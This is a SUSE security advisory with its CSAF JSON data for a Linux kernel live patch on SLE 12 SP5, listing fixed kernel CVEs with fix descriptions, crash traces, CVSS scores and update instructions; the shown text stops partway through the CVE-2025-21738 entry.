7.8 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.8 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.8 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
References
49 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel (Live Patch 70 for SUSE Linux Enterprise 12 SP5)",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThis update for the SUSE Linux Enterprise Kernel 4.12.14-122.266 fixes various security issues\n\nThe following security issues were fixed:\n\n- CVE-2022-50423: ACPICA: Fix use-after-free in acpi_ut_copy_ipackage_to_ipackage() (bsc#1250785).\n- CVE-2022-50697: mrp: introduce active flags to prevent UAF when applicant uninit (bsc#1255595).\n- CVE-2022-50756: nvme-pci: fix mempool alloc size (bsc#1256217).\n- CVE-2023-53781: smc: Fix use-after-free in tcp_write_timer_handler() (bsc#1254755).\n- CVE-2025-21738: ata: libata-sff: ensure that we cannot write outside the allocated buffer (bsc#1257118).\n- CVE-2025-38488: smb: client: fix use-after-free in crypt_message when using async crypto (bsc#1247240).\n- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1044,SUSE-SLE-Live-Patching-12-SP5-2026-1044",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1044-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1044-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261044-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1044-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024931.html"
},
{
"category": "self",
"summary": "SUSE Bug 1247240",
"url": "https://bugzilla.suse.com/1247240"
},
{
"category": "self",
"summary": "SUSE Bug 1250785",
"url": "https://bugzilla.suse.com/1250785"
},
{
"category": "self",
"summary": "SUSE Bug 1254755",
"url": "https://bugzilla.suse.com/1254755"
},
{
"category": "self",
"summary": "SUSE Bug 1255402",
"url": "https://bugzilla.suse.com/1255402"
},
{
"category": "self",
"summary": "SUSE Bug 1255595",
"url": "https://bugzilla.suse.com/1255595"
},
{
"category": "self",
"summary": "SUSE Bug 1256217",
"url": "https://bugzilla.suse.com/1256217"
},
{
"category": "self",
"summary": "SUSE Bug 1256624",
"url": "https://bugzilla.suse.com/1256624"
},
{
"category": "self",
"summary": "SUSE Bug 1256644",
"url": "https://bugzilla.suse.com/1256644"
},
{
"category": "self",
"summary": "SUSE Bug 1257118",
"url": "https://bugzilla.suse.com/1257118"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2022-50423 page",
"url": "https://www.suse.com/security/cve/CVE-2022-50423/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2022-50697 page",
"url": "https://www.suse.com/security/cve/CVE-2022-50697/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2022-50756 page",
"url": "https://www.suse.com/security/cve/CVE-2022-50756/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53781 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53781/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-21738 page",
"url": "https://www.suse.com/security/cve/CVE-2025-21738/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38488 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38488/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68285 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
}
],
"title": "Security update for the Linux Kernel (Live Patch 70 for SUSE Linux Enterprise 12 SP5)",
"tracking": {
"current_release_date": "2026-03-25T17:54:43Z",
"generator": {
"date": "2026-03-25T17:54:43Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1044-1",
"initial_release_date": "2026-03-25T17:54:43Z",
"revision_history": [
{
"date": "2026-03-25T17:54:43Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le",
"product": {
"name": "kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le",
"product_id": "kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kgraft-patch-4_12_14-122_266-default-11-2.1.s390x",
"product": {
"name": "kgraft-patch-4_12_14-122_266-default-11-2.1.s390x",
"product_id": "kgraft-patch-4_12_14-122_266-default-11-2.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64",
"product": {
"name": "kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64",
"product_id": "kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 12 SP5",
"product": {
"name": "SUSE Linux Enterprise Live Patching 12 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 12 SP5",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-live-patching:12:sp5"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le as component of SUSE Linux Enterprise Live Patching 12 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le"
},
"product_reference": "kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 12 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kgraft-patch-4_12_14-122_266-default-11-2.1.s390x as component of SUSE Linux Enterprise Live Patching 12 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x"
},
"product_reference": "kgraft-patch-4_12_14-122_266-default-11-2.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 12 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64 as component of SUSE Linux Enterprise Live Patching 12 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64"
},
"product_reference": "kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 12 SP5"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2022-50423",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2022-50423"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nACPICA: Fix use-after-free in acpi_ut_copy_ipackage_to_ipackage()\n\nThere is an use-after-free reported by KASAN:\n\n BUG: KASAN: use-after-free in acpi_ut_remove_reference+0x3b/0x82\n Read of size 1 at addr ffff888112afc460 by task modprobe/2111\n CPU: 0 PID: 2111 Comm: modprobe Not tainted 6.1.0-rc7-dirty\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),\n Call Trace:\n \u003cTASK\u003e\n kasan_report+0xae/0xe0\n acpi_ut_remove_reference+0x3b/0x82\n acpi_ut_copy_iobject_to_iobject+0x3be/0x3d5\n acpi_ds_store_object_to_local+0x15d/0x3a0\n acpi_ex_store+0x78d/0x7fd\n acpi_ex_opcode_1A_1T_1R+0xbe4/0xf9b\n acpi_ps_parse_aml+0x217/0x8d5\n ...\n \u003c/TASK\u003e\n\nThe root cause of the problem is that the acpi_operand_object\nis freed when acpi_ut_walk_package_tree() fails in\nacpi_ut_copy_ipackage_to_ipackage(), lead to repeated release in\nacpi_ut_copy_iobject_to_iobject(). The problem was introduced\nby \"8aa5e56eeb61\" commit, this commit is to fix memory leak in\nacpi_ut_copy_iobject_to_iobject(), repeatedly adding remove\noperation, lead to \"acpi_operand_object\" used after free.\n\nFix it by removing acpi_ut_remove_reference() in\nacpi_ut_copy_ipackage_to_ipackage(). acpi_ut_copy_ipackage_to_ipackage()\nis called to copy an internal package object into another internal\npackage object, when it fails, the memory of acpi_operand_object\nshould be freed by the caller.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2022-50423",
"url": "https://www.suse.com/security/cve/CVE-2022-50423"
},
{
"category": "external",
"summary": "SUSE Bug 1250784 for CVE-2022-50423",
"url": "https://bugzilla.suse.com/1250784"
},
{
"category": "external",
"summary": "SUSE Bug 1250785 for CVE-2022-50423",
"url": "https://bugzilla.suse.com/1250785"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T17:54:43Z",
"details": "important"
}
],
"title": "CVE-2022-50423"
},
{
"cve": "CVE-2022-50697",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2022-50697"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmrp: introduce active flags to prevent UAF when applicant uninit\n\nThe caller of del_timer_sync must prevent restarting of the timer, If\nwe have no this synchronization, there is a small probability that the\ncancellation will not be successful.\n\nAnd syzbot report the fellowing crash:\n==================================================================\nBUG: KASAN: use-after-free in hlist_add_head include/linux/list.h:929 [inline]\nBUG: KASAN: use-after-free in enqueue_timer+0x18/0xa4 kernel/time/timer.c:605\nWrite at addr f9ff000024df6058 by task syz-fuzzer/2256\nPointer tag: [f9], memory tag: [fe]\n\nCPU: 1 PID: 2256 Comm: syz-fuzzer Not tainted 6.1.0-rc5-syzkaller-00008-\nge01d50cbd6ee #0\nHardware name: linux,dummy-virt (DT)\nCall trace:\n dump_backtrace.part.0+0xe0/0xf0 arch/arm64/kernel/stacktrace.c:156\n dump_backtrace arch/arm64/kernel/stacktrace.c:162 [inline]\n show_stack+0x18/0x40 arch/arm64/kernel/stacktrace.c:163\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0x68/0x84 lib/dump_stack.c:106\n print_address_description mm/kasan/report.c:284 [inline]\n print_report+0x1a8/0x4a0 mm/kasan/report.c:395\n kasan_report+0x94/0xb4 mm/kasan/report.c:495\n __do_kernel_fault+0x164/0x1e0 arch/arm64/mm/fault.c:320\n do_bad_area arch/arm64/mm/fault.c:473 [inline]\n do_tag_check_fault+0x78/0x8c arch/arm64/mm/fault.c:749\n do_mem_abort+0x44/0x94 arch/arm64/mm/fault.c:825\n el1_abort+0x40/0x60 arch/arm64/kernel/entry-common.c:367\n el1h_64_sync_handler+0xd8/0xe4 arch/arm64/kernel/entry-common.c:427\n el1h_64_sync+0x64/0x68 arch/arm64/kernel/entry.S:576\n hlist_add_head include/linux/list.h:929 [inline]\n enqueue_timer+0x18/0xa4 kernel/time/timer.c:605\n mod_timer+0x14/0x20 kernel/time/timer.c:1161\n mrp_periodic_timer_arm net/802/mrp.c:614 [inline]\n mrp_periodic_timer+0xa0/0xc0 net/802/mrp.c:627\n call_timer_fn.constprop.0+0x24/0x80 kernel/time/timer.c:1474\n expire_timers+0x98/0xc4 kernel/time/timer.c:1519\n\nTo fix it, we can introduce a new active flags to make sure the timer will\nnot restart.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2022-50697",
"url": "https://www.suse.com/security/cve/CVE-2022-50697"
},
{
"category": "external",
"summary": "SUSE Bug 1255594 for CVE-2022-50697",
"url": "https://bugzilla.suse.com/1255594"
},
{
"category": "external",
"summary": "SUSE Bug 1255595 for CVE-2022-50697",
"url": "https://bugzilla.suse.com/1255595"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T17:54:43Z",
"details": "important"
}
],
"title": "CVE-2022-50697"
},
{
"cve": "CVE-2022-50756",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2022-50756"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme-pci: fix mempool alloc size\n\nConvert the max size to bytes to match the units of the divisor that\ncalculates the worst-case number of PRP entries.\n\nThe result is used to determine how many PRP Lists are required. The\ncode was previously rounding this to 1 list, but we can require 2 in the\nworst case. In that scenario, the driver would corrupt memory beyond the\nsize provided by the mempool.\n\nWhile unlikely to occur (you\u0027d need a 4MB in exactly 127 phys segments\non a queue that doesn\u0027t support SGLs), this memory corruption has been\nobserved by kfence.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2022-50756",
"url": "https://www.suse.com/security/cve/CVE-2022-50756"
},
{
"category": "external",
"summary": "SUSE Bug 1256216 for CVE-2022-50756",
"url": "https://bugzilla.suse.com/1256216"
},
{
"category": "external",
"summary": "SUSE Bug 1256217 for CVE-2022-50756",
"url": "https://bugzilla.suse.com/1256217"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T17:54:43Z",
"details": "important"
}
],
"title": "CVE-2022-50756"
},
{
"cve": "CVE-2023-53781",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53781"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmc: Fix use-after-free in tcp_write_timer_handler().\n\nWith Eric\u0027s ref tracker, syzbot finally found a repro for\nuse-after-free in tcp_write_timer_handler() by kernel TCP\nsockets. [0]\n\nIf SMC creates a kernel socket in __smc_create(), the kernel\nsocket is supposed to be freed in smc_clcsock_release() by\ncalling sock_release() when we close() the parent SMC socket.\n\nHowever, at the end of smc_clcsock_release(), the kernel\nsocket\u0027s sk_state might not be TCP_CLOSE. This means that\nwe have not called inet_csk_destroy_sock() in __tcp_close()\nand have not stopped the TCP timers.\n\nThe kernel socket\u0027s TCP timers can be fired later, so we\nneed to hold a refcnt for net as we do for MPTCP subflows\nin mptcp_subflow_create_socket().\n\n[0]:\nleaked reference.\n sk_alloc (./include/net/net_namespace.h:335 net/core/sock.c:2108)\n inet_create (net/ipv4/af_inet.c:319 net/ipv4/af_inet.c:244)\n __sock_create (net/socket.c:1546)\n smc_create (net/smc/af_smc.c:3269 net/smc/af_smc.c:3284)\n __sock_create (net/socket.c:1546)\n __sys_socket (net/socket.c:1634 net/socket.c:1618 net/socket.c:1661)\n __x64_sys_socket (net/socket.c:1672)\n do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80)\n entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:120)\n==================================================================\nBUG: KASAN: slab-use-after-free in tcp_write_timer_handler (net/ipv4/tcp_timer.c:378 net/ipv4/tcp_timer.c:624 net/ipv4/tcp_timer.c:594)\nRead of size 1 at addr ffff888052b65e0d by task syzrepro/18091\n\nCPU: 0 PID: 18091 Comm: syzrepro Tainted: G W 6.3.0-rc4-01174-gb5d54eb5899a #7\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-1.amzn2022.0.1 04/01/2014\nCall Trace:\n \u003cIRQ\u003e\n dump_stack_lvl (lib/dump_stack.c:107)\n print_report (mm/kasan/report.c:320 mm/kasan/report.c:430)\n kasan_report (mm/kasan/report.c:538)\n tcp_write_timer_handler (net/ipv4/tcp_timer.c:378 net/ipv4/tcp_timer.c:624 net/ipv4/tcp_timer.c:594)\n tcp_write_timer (./include/linux/spinlock.h:390 net/ipv4/tcp_timer.c:643)\n call_timer_fn (./arch/x86/include/asm/jump_label.h:27 ./include/linux/jump_label.h:207 ./include/trace/events/timer.h:127 kernel/time/timer.c:1701)\n __run_timers.part.0 (kernel/time/timer.c:1752 kernel/time/timer.c:2022)\n run_timer_softirq (kernel/time/timer.c:2037)\n __do_softirq (./arch/x86/include/asm/jump_label.h:27 ./include/linux/jump_label.h:207 ./include/trace/events/irq.h:142 kernel/softirq.c:572)\n __irq_exit_rcu (kernel/softirq.c:445 kernel/softirq.c:650)\n irq_exit_rcu (kernel/softirq.c:664)\n sysvec_apic_timer_interrupt (arch/x86/kernel/apic/apic.c:1107 (discriminator 14))\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53781",
"url": "https://www.suse.com/security/cve/CVE-2023-53781"
},
{
"category": "external",
"summary": "SUSE Bug 1254751 for CVE-2023-53781",
"url": "https://bugzilla.suse.com/1254751"
},
{
"category": "external",
"summary": "SUSE Bug 1254755 for CVE-2023-53781",
"url": "https://bugzilla.suse.com/1254755"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.s390x",
"SUSE Linux Enterprise Live Patching 12 SP5:kgraft-patch-4_12_14-122_266-default-11-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T17:54:43Z",
"details": "important"
}
],
"title": "CVE-2023-53781"
},
{
"cve": "CVE-2025-21738",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-21738"
}
],
"notes": [
{
"category": "general",
